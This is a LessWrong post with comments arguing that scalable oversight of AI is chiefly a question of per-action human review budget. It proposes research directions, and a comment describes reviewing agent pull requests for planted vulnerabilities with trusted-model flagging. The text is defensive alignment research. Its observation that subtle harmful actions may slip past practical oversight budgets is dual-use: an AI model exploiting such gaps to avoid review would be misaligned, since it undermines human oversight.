Scalable oversight as a quantitative rather than qualitative problem
post by Buck · 2024-07-06T17:42:41.325Z · LW · GW · 11 commentsContents
11 comments
[Many of these ideas were developed in conversation with Ryan Greenblatt and Ansh Radhakrishnan; a lot of this isn’t original but I haven’t seen it written up]
A lot of the time when people talk about scalable oversight, which I'll define for the moment as "the problem of developing techniques that allow you to assess whether an action taken or proposed by an AI is good (oversee it), in a way that works even if the AI is very smart and knowledgeable", the main application they describe is the following situation: you have an extremely powerful AI that's taking actions that might have subtle properties that humans are unable to understand, and you want to be oversee them (e.g. to train it, or to determine whether the actions will have catastrophic consequences).
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it's missing the more central application of these techniques: situations where the AIs are taking many actions, where humans would eventually understand any particular action if they spent a whole lot of time investigating it, but where that amount of time taken to oversee any action is prohibitively large. In such cases, the point of scalable oversight is to allow them to oversee actions at a much lower cost in terms of human time--to push out the Pareto frontier of oversight quality vs cost.
Of course, when you're thinking about arbitrarily subtle actions, this distinction doesn't matter: there are actions subtle enough that overseeing them would take more than the whole budget of the AI project, and for those actions there's no difference between "we can't afford to oversee it" and "we'd never be able to oversee it even with infinite budget".
But I think that this distinction will be very important in practice, and I often think that people make reasoning errors when thinking about scalable oversight due to neglecting it. The basic reason to think that it's important is that we probably need to oversee many model actions, and so we probably need to decide on a per-action oversight budget (e.g. the amount of human labor spent on ) that will determine what subtlety of actions we will or won't be able to resolve, but we probably won't choose a per-action oversight budget that is close to the whole AI project budget.
Another reason this feels important to me is that, as discussed here, I think a lot of AI risk comes from early transformative models that aren't that much smarter than humans; when thinking through the risk associated with them, it feels pretty implausible that a dangerous action of theirs would be unoverseeable if the whole AI project's budget was spent on overseeing it, but it feel very plausible that with the practical per-action oversight budget, the actions will be too subtle to oversee properly.
What implications does this have for research:
- One question that seems extremely important to me as a result of all this is: what sample efficiency should we expect when training very powerful models? This is relevant because it's a key part of forecasting the per-action oversight budget. In particular, if the sample efficiency of RL increases with large models, it might turn out that the optimal strategy for RLing early transformative models is to produce many fewer and much more expensive labels than people use when training current systems; I think people often neglect this possibility when thinking about the future of scalable oversight. I’d love to see some careful research analyzing the tradeoffs between label quality and quantity, and how these change with model scale. (Ansh has done a bit of investigation along these lines.) (I'm using "labels" to mean the output of the oversight process: it might be rewards or preferences between proposed actions.)
- When imagining scalable oversight in the future, I don’t think people should entirely be imagining cases where the researchers are fundamentally unable to understand what’s going on or to ever do any labeling themselves, I think they should be imagining cases where the researchers can do a couple of labels themselves but it’s hard and expensive for them. This is kind of like the situation researchers face when developing jailbreaks for models: they can do it, but it takes quite a while to develop each one, so they e.g. can’t have a quick feedback loop where they change the policy that they’re overseeing and then quickly oversee a bunch of new random actions that it took.
- It might be interesting to see research on how human oversight quality changes as a function of resource allocation to it, especially in key domains like auditing code for backdoors (as in our paper [AF · GW]) or cases where we expect it to be particularly expensive to produce high-quality oversight.
Another minor distinction here: I think it's a bit useful to distinguish between cases where your oversight process isn't good enough because (for a fixed level of quality) it has overly low throughput (that is, given your fixed budget, you can't make enough labels) and because it has overly high latency (that is, your labels arrive too late). Latency might be a problem for a few reasons. One is that if you were using your oversight to review potentially catastrophic actions, your AIs agents might be waiting around for the result of the review, and if you're too slow, they might be substantially less efficient. Another is that online training works worse if the labels have more latency.
11 comments
Comments sorted by top scores.
comment by johnswentworth · 2024-07-06T19:00:20.884Z · LW(p) · GW(p)
... situations where the AIs are taking many actions, where humans would eventually understand any particular action if they spent a whole lot of time investigating it...
Can you give an example (toy example is fine) of:
- an action one might want to understand
- what plan/strategy/other context that action is a part of
- what it would look like for a human to understand the action
?
Mostly I'm confused what it would even mean to understand an action. Like, if I imagine a maze-solving AI, and I see it turn left at a particular spot (or plan to turn left), I'm not sure what it would even look like to "understand" that left-turn separate from understanding its whole maze-plan.
Replies from: ryan_greenblatt, ryan_greenblatt, Aprillion↑ comment by ryan_greenblatt · 2024-07-06T19:58:24.094Z · LW(p) · GW(p)
Sure. Imagine you have an AI which was instructed to add some feature or fix some bug in a code base.
That AI writes a bunch of code, runs various tests in a sandbox, and the submits a PR.
We need to review this PR, rate how good it is, and determine if it is actively harmful (e.g. adds a vulnerability).
The human can potentially review the full agent trajectory to help determine what is going on.
Understanding some parts of the code base, the tests the AI added, and what the PR was supposed to do are all important for reviewing it.
(In practice, you'll also potentially want to review code that the AI is about to run in the sandbox (prior to it being run) in cases where a trusted model thinks the code is suspicious (depending on how secure we think the sandbox is).)
Replies from: johnswentworth↑ comment by johnswentworth · 2024-07-06T20:13:19.767Z · LW(p) · GW(p)
Based on this example and your other comment, it sounds like the intended claim of the post could be expressed as:
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it's missing the more central application of these techniques: situations where the AIs
are taking many actionssolving many subproblems, where humans would eventually understandany particular actionany particular subproblem and its solution if they spent a whole lot of time investigating it, but where that amount of time taken to oversee anyactionsubproblem is prohibitively large. In such cases, the point of scalable oversight is to allow them to overseeactionssubproblems at a much lower cost in terms of human time--to push out the Pareto frontier of oversight quality vs cost.
Does that accurately express the intended message?
↑ comment by Buck · 2024-07-06T20:41:04.652Z · LW(p) · GW(p)
No, because I'm not trying to say that the humans understand the subproblem well enough to e.g. know what the best answer to it is, I'm trying to say that they understand the subproblem well enough to know how good an answer the answer provided was.
Replies from: johnswentworth↑ comment by johnswentworth · 2024-07-06T21:35:20.913Z · LW(p) · GW(p)
I wasn't imagining that the human knew the best answer to any given subproblem, but nonetheless that did flesh out a lot more of what it means (under your mental model) for a human to "understand a subproblem", so that was useful.
I'll try again:
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it's missing the more central application of these techniques: situations where the AIs
are taking many actionssolving many subproblems, where humans would eventually understandany particular actionhow well the AI's plan/action solves any particular subproblem if they spent a whole lot of time investigating it, but where that amount of time taken to oversee anyactionsubproblem is prohibitively large. In such cases, the point of scalable oversight is to allow them to overseeactionssubproblems at a much lower cost in terms of human time--to push out the Pareto frontier of oversight quality vs cost.
(... and presumably an unstated piece here is that "understanding how well the AI's plan/action solves a particular subproblem" might include recursive steps like "here's a sub-sub-problem, assume the AI's actions do a decent job solving that one", where the human might not actually check the sub-sub-problem.)
Does that accurately express the intended message?
Replies from: Buck↑ comment by Buck · 2024-07-07T16:11:45.693Z · LW(p) · GW(p)
Sort of; I don't totally understand why you want to phrase things in terms of subproblems instead of actions but I think it's probably equivalent to do so, except that it's pretty weird to describe an AI as only solving "subproblems". Like, I think it's kind of unnatural to describe ChatGPT as "solving many subproblems"; in some sense I guess you can think of all its answers as solutions to subproblems of the "be a good product" problem, but I don't think that's a very helpful frame.
↑ comment by ryan_greenblatt · 2024-07-06T20:01:48.229Z · LW(p) · GW(p)
I think a notion of understanding individual actions requires breaking things down into steps which aim to accomplish specific things.
(Including potentially judging decompositions that AIs come up with.)
So, in the maze case, you're probably fine just judging where it ends up (and the speed/cost of the path) given that we don't care about particular choices and there very likely aren't problematic side effects unless the AI is very, very super intelligent.
↑ comment by Aprillion · 2024-07-07T11:41:15.051Z · LW(p) · GW(p)
How I personally understand what it could mean to "understand an action:"
Having observed action A1 and having a bunch of (finite state machine-ish) models, each with a list of states that could lead to action A1, more accurate candidate model => more understanding. (and meta-level uncertainty about which model is right => less understanding)
Model 1 Model 2
S11 -> 50% A1 S21 -> 99% A1
-> 50% A2 -> 1% A2
S21 -> 10% A1 S22 -> 1% A1
-> 90% A3 -> 99% A2
S23 -> 100% A3
comment by Geoffrey Irving · 2024-07-29T18:38:36.948Z · LW(p) · GW(p)
+1 to the quantitative story. I’ll do the stereotypical thing and add self-links: https://arxiv.org/abs/2311.14125 talks about the purest quantitative situation for debate, and https://www.alignmentforum.org/posts/DGt9mJNKcfqiesYFZ/debate-oracles-and-obfuscated-arguments-3 [AF · GW] talks about obfuscated arguments as we start to add back non-quantitative aspects.
comment by Nate Showell · 2024-07-06T20:09:08.955Z · LW(p) · GW(p)
In particular, if the sample efficiency of RL increases with large models, it might turn out that the optimal strategy for RLing early transformative models is to produce many fewer and much more expensive labels than people use when training current systems; I think people often neglect this possibility when thinking about the future of scalable oversight.
This paper found higher sample efficiency for larger reinforcement learning models (see Fig. 5 and section 5.5).
Replies from: Buck